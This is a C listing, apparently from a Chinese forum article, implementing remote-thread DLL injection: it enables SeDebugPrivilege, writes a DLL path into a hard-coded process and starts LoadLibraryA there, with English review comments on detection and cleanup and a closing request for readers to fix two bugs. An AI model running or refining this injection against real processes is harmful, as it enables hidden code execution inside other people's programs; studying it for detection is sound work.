DLL 注入文章,需修改一些部分
#include "stdio.h"
#include "windows.h"
/* Forward declaration; defined after main. Tries to enable SeDebugPrivilege
 * on the current process token and reports nothing back to the caller. */
void Enable();
/* ANSI path of the DLL. main copies these bytes (terminator included) into
 * the target process and hands the remote copy to LoadLibraryA. */
char name[]="c:\\a.dll";
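/*
 * Demonstration from the article: makes another process load the DLL named
 * by `name`. It opens the target, copies the path string into it, and starts
 * a remote thread whose entry point is LoadLibraryA with that string as its
 * argument.
 *
 * The target is the hard-coded process id 224, which is specific to the
 * author's machine at the time of writing.
 *
 * The OpenProcess / VirtualAllocEx / WriteProcessMemory / CreateRemoteThread
 * sequence is the pattern endpoint monitoring looks for (for example Sysmon
 * Event ID 10 ProcessAccess and Event ID 8 CreateRemoteThread).
 *
 * Changes from the published listing are limited to local hygiene: every
 * handle is closed on every path, the remote buffer is released when the
 * thread was never started, GetLastError() is printed with a matching
 * format specifier, and the misspelled "VirtralAllocEx" message is fixed.
 *
 * `void main()` is kept as published; standard C expects `int main(void)`.
 */
void main()
{
    HANDLE h = NULL;
    HANDLE hRemote = NULL;
    char *pRemoteM = NULL;
    BOOL started = FALSE;
    /* name is a char array, so sizeof already counts the terminating NUL. */
    SIZE_T cb = sizeof name;
    LPTHREAD_START_ROUTINE RemoteThread;
    DWORD receive;

    /* Best effort: Enable() has no return value, so a failure there only
     * shows up as OpenProcess failing below. */
    Enable();

    h = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, 224);
    if (h == NULL) {
        printf("open remote process error ! %lu\n", GetLastError());
        return;
    }

    /* NOTE(review): the region only ever holds the path string (data); the
     * listing also requests execute permission, which is broader than that
     * use requires. Left as published. */
    pRemoteM = (char *)VirtualAllocEx(h, 0, cb, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (pRemoteM == NULL) {
        printf("VirtualAllocEx error ! %lu\n", GetLastError());
        goto cleanup;
    }

    if (WriteProcessMemory(h, pRemoteM, name, cb, 0) == FALSE) {
        printf("WriteProcessMemory error ! %lu\n", GetLastError());
        goto cleanup;
    }

    /* The address is resolved in this process and used in the target; the
     * A-suffixed call keeps the narrow literal valid in a UNICODE build. */
    RemoteThread = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
    if (RemoteThread == NULL) {
        printf("GetProcAddress error ! %lu\n", GetLastError());
        goto cleanup;
    }

    hRemote = CreateRemoteThread(h, 0, 0, RemoteThread, pRemoteM, 0, &receive);
    if (hRemote == NULL) {
        printf("CreateRemoteThread error ! %lu\n", GetLastError());
        goto cleanup;
    }
    started = TRUE;

cleanup:
    /* Once the thread exists it may still be reading the buffer, so the
     * remote memory is released only when the thread was never started. */
    if (!started && pRemoteM != NULL) {
        VirtualFreeEx(h, pRemoteM, 0, MEM_RELEASE);
    }
    if (hRemote != NULL) {
        CloseHandle(hRemote);
    }
    CloseHandle(h);
}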
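/*
 * Best-effort attempt to enable SeDebugPrivilege on the current process
 * token. Returns nothing; the caller cannot tell whether it succeeded.
 *
 * Fix over the published listing: the token handle was closed only when
 * AdjustTokenPrivileges failed, so it leaked on the success path. It is now
 * closed on every path once it has been opened.
 */
void Enable()
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tkp;

    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return;
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid)) {
        /*
         * AdjustTokenPrivileges returns nonzero even when the account does
         * not hold the privilege; in that case GetLastError() reports
         * ERROR_NOT_ALL_ASSIGNED. The result is deliberately not inspected
         * here, matching the original best-effort behaviour.
         */
        AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL);
    }

    CloseHandle(hToken);
}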
经过编译运行,可以远程插入线程,存在如下问题:
1. 第一次插入运行正常,但之后再次插入时,线程就没有任何反应了。
2. 线程被插入远程进程并执行之后似乎没有退出:在任务管理器中看到该线程仍然存在。
解决了这两个问题后,该程序就可以正常使用了,希望大家在上面修改一下!:)